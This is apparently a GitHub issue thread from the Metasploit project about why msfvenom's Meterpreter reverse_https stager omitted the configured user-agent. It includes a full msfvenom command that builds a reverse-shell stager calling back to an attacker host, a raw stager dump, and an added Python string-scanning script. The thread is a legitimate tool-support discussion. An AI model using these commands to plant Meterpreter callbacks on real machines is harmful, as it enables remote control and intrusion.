No user-agent embedded in the shellcode via msfvenom with payload 'windows/x64/meterpreter/reverse_https' #19764

Open
sscoconutree opened this issue Dec 25, 2024 · 6 comments
Labels
bug payload question Questions about Metasploit Usage

Comments

@sscoconutree
Summary

How come there are no user-agent strings embedded in the shellcode when using this command:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 PayloadUUIDTracking=true HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/131.0.2903.86" PayloadUUIDName="foobar" -f raw EXITFUNC=thread -o shellcode.bin

I tried to send a request over my web server and this was shown in my apache2 logs.

[image: apache2 access log entry for the test request]

Checking the plaintext of this shellcode, it seems only the IP of my web server and the initial URI are baked in.

[image: printable strings extracted from shellcode.bin]

Relevant information

I found a similar issue before, and I checked the source code again in the latest version of Metasploit. It seems the changes by @busterb from the issue below were already applied; however, I was still having problems with how to embed the initial user-agent in the shellcode.

#11075
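The check the reporter did by hand (look at the raw bytes and see which configured values are present) is easy to automate. The script below is an added example, not part of this issue and not Metasploit code: it scans a blob for the host, user-agent and URI strings handed to the generator and reports their byte offsets, plus a `strings`-style listing and a search for path-like tokens. The blob it scans is constructed (opcode-like filler around inline strings, not real shellcode); the host and user-agent values are the ones visible in the sample `generate` output further down the thread, and the URI value is made up.

```python
#!/usr/bin/env python3
"""Check which configuration strings a raw payload blob embeds.

Added example, not Metasploit code. It automates the manual check from the
issue: read the raw bytes that msfvenom wrote (here a constructed stand-in,
not real shellcode) and report whether the host, the user-agent and the
URI handed to the generator actually appear in the blob, and where.
"""
import re
from typing import Dict, Iterator, List, Optional, Tuple

# Host and user-agent taken from the sample output in the thread; the URI is constructed.
HOST = "88.88.88.88"
USER_AGENT = "AMAZING USER AGENT NOT A MALWARE"
URI = "/XYwR6x1PSXPPnc6fqOJpOAYLH2-WWBC"


def build_blob(user_agent: Optional[str]) -> bytes:
    """Construct a stand-in blob: opcode-like filler around the inline strings.

    Passing user_agent=None mimics the behaviour reported in the issue,
    where only the host and the URI were baked in.
    """
    parts = [b"\xfc\x48\x83\xe4\xf0\xe8", b"wininet\x00"]
    if user_agent is not None:
        parts.append(user_agent.encode("ascii") + b"\x00")
    parts += [b"\x4d\x31\xc9", HOST.encode("ascii") + b"\x00",
              b"\xe8\x00", URI.encode("ascii") + b"\x00", b"\x48\x31\xc0"]
    return b"".join(parts)


def printable_strings(blob: bytes, min_len: int = 8) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for runs of printable ASCII, like the strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    for m in re.finditer(pattern, blob):
        yield m.start(), m.group().decode("ascii")


def find_config_strings(blob: bytes, expected: Dict[str, str]) -> Dict[str, Optional[int]]:
    """Map each expected value's label to its byte offset, or None if absent."""
    found: Dict[str, Optional[int]] = {}
    for label, value in expected.items():
        off = blob.find(value.encode("ascii"))
        found[label] = off if off >= 0 else None
    return found


def find_uri_paths(blob: bytes, min_len: int = 16) -> List[str]:
    """Return path-like strings (a slash followed by a long URL-safe token)."""
    pattern = re.compile(r"/[A-Za-z0-9_-]{%d,}" % min_len)
    paths: List[str] = []
    for _, text in printable_strings(blob):
        paths.extend(pattern.findall(text))
    return paths


def missing(blob: bytes, expected: Dict[str, str]) -> List[str]:
    """Labels of expected values that the blob does not carry inline."""
    return [k for k, v in find_config_strings(blob, expected).items() if v is None]


if __name__ == "__main__":
    expected = {"host": HOST, "user_agent": USER_AGENT, "uri": URI}
    for name, blob in (("fixed", build_blob(USER_AGENT)), ("old", build_blob(None))):
        print(f"[{name}] offsets: {find_config_strings(blob, expected)}")
        print(f"[{name}] missing: {missing(blob, expected) or 'nothing'}")
        print(f"[{name}] uri-like strings: {find_uri_paths(blob)}")
```

To use it on a real file, replace the `build_blob(...)` calls with `open("shellcode.bin", "rb").read()` and put the exact values passed on the msfvenom command line into `expected`; a `None` offset for `user_agent` is the symptom this issue describes, and the `missing` list gives a one-line verdict. Searching for the literal string is only meaningful for payloads that store options inline, which the `generate -f raw` output in this thread shows this stager does.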

@sscoconutree sscoconutree added the question Questions about Metasploit Usage label Dec 25, 2024
@sscoconutree sscoconutree changed the title No user-agent embedded in the shellcode via msfvenom using 'windows/x64/meterpreter/reverse_https' No user-agent embedded in the shellcode via msfvenom with payload 'windows/x64/meterpreter/reverse_https' Dec 25, 2024
@dledda-r7 dledda-r7 self-assigned this Jan 8, 2025
@dledda-r7 dledda-r7 moved this to Todo in Metasploit Kanban Jan 8, 2025
@dledda-r7
Contributor

dledda-r7 commented Jan 8, 2025

Hello @sscoconutree, I'll look into this. Just to triage the issue, are the other options working for you? For example, the proxy-related options (HttpProxyHost, HttpProxyPort and so on)? Thanks!

@sscoconutree
Author

sscoconutree commented Jan 8, 2025

> Hello @sscoconutree, I'll look into this. Just to triage the issue, are the other options working for you? For example, the proxy-related options (HttpProxyHost, HttpProxyPort and so on)? Thanks!

Hello, I haven't tried those options since they aren't needed in my current experiment, and I don't quite know how to integrate them with it.

Thank you for looking into this issue!

@dledda-r7 dledda-r7 added the confirmed Issues confirmed by a committer label Jan 9, 2025
@dledda-r7
Contributor

dledda-r7 commented Jan 9, 2025

@sscoconutree what version of Metasploit are you using? Make sure your version includes this PR:
#19726

Make sure you have: metasploit v6.4.44-dev-9b75fc50ec

msf6 payload(windows/x64/meterpreter/reverse_https) > set httpUserAgent AMAZING USER AGENT NOT A MALWARE
httpUserAgent => AMAZING USER AGENT NOT A MALWARE
msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw
A���RAQH�R �B<H�f�x`H�RQH�R VH�JJM1�H�rPH1��<a|, A��
A�8�u�LLE9�u�XD�@$I�fA��H��tgH�P�HD�@ I��VH��M1�A�4�H�H1��A��
                       HD�@I�A��AXAXH�^YZAXAYAZH�� AR��XAYZH��K���]H1�SI�wininetAVH��I��Lw&��SS�!AMAZING USER AGENT NOT A MALWAREYSZM1�M1�SSI�:Vy����
                                                                                                                                                     88.88.88.88ZH��I��� M1�SSjSI�W������/XYwR6x1PSXPPnc6fqOJpOAYLH2-WWBC-zQY302m7yzSDB5dTxTPqJjuB_Qh3kOZmjzUHT15UKUuKl7Fl2ep6II0zLi7ZhxxCArFYmSgTt2BLbtFgjFauT9cXRRfV3dMwb0sj2lgZTd8evLcR01VoC8yXkHobOwtxN5_2UYyaEP-MgYwa7GGuH��SZAXM1�SH�2��PSSI���U.;��H��j
_H��jZRh�3I��jAYI�uF����M1�SZH��M1�M1�SSI��-{�Յ�uH���I�D�5���H��t��USYj@ZI����I��I�X�S���H�SSH��H��H��I�� I��I������H�� ��t�f�HÅ�u�X�XjYI���V��
msf6 payload(windows/x64/meterpreter/reverse_https) > banner

@dledda-r7 dledda-r7 removed the confirmed Issues confirmed by a committer label Jan 9, 2025
@dledda-r7 dledda-r7 removed their assignment Jan 9, 2025
@sscoconutree
Author

> @sscoconutree what version of Metasploit are you using? Make sure your version includes this PR: #19726
>
> Make sure you have: metasploit v6.4.44-dev-9b75fc50ec
>
> msf6 payload(windows/x64/meterpreter/reverse_https) > set httpUserAgent AMAZING USER AGENT NOT A MALWARE
> httpUserAgent => AMAZING USER AGENT NOT A MALWARE
> msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw
> A���RAQH�R �B<H�f�x`H�RQH�R VH�JJM1�H�rPH1��<a|, A��
> A�8�u�LLE9�u�XD�@$I�fA��H��tgH�P�HD�@ I��VH��M1�A�4�H�H1��A��
> HD�@I�A��AXAXH�^YZAXAYAZH�� AR��XAYZH��K���]H1�SI�wininetAVH��I��Lw&��SS�!AMAZING USER AGENT NOT A MALWAREYSZM1�M1�SSI�:Vy����
> 88.88.88.88ZH��I��� M1�SSjSI�W������/XYwR6x1PSXPPnc6fqOJpOAYLH2-WWBC-zQY302m7yzSDB5dTxTPqJjuB_Qh3kOZmjzUHT15UKUuKl7Fl2ep6II0zLi7ZhxxCArFYmSgTt2BLbtFgjFauT9cXRRfV3dMwb0sj2lgZTd8evLcR01VoC8yXkHobOwtxN5_2UYyaEP-MgYwa7GGuH��SZAXM1�SH�2��PSSI���U.;��H��j
> _H��jZRh�3I��jAYI�uF����M1�SZH��M1�M1�SSI��-{�Յ�uH���I�D�5���H��t��USYj@ZI����I��I�X�S���H�SSH��H��H��I�� I��I������H�� ��t�f�HÅ�u�X�XjYI���V��
> msf6 payload(windows/x64/meterpreter/reverse_https) > banner

Hi, this is the version I have: metasploit v6.4.34-dev

I guess I need to update mine.

Thank you for your help!

@sscoconutree
Author

msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 PayloadUUIDTracking=true HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/131.0.2903.86" PayloadUUIDName="foobar" -f raw EXITFUNC=thread -o shellcode.bin

It seems to be working now.

[image: apache2 access log entry showing the configured user-agent]

Lastly, do we have an option in metasploit to have custom URIs in the shellcode?

@dledda-r7
Contributor

dledda-r7 commented Jan 10, 2025

No, changing the URI with that payload is not possible.

Projects
Status: Todo
Development

No branches or pull requests

2 participants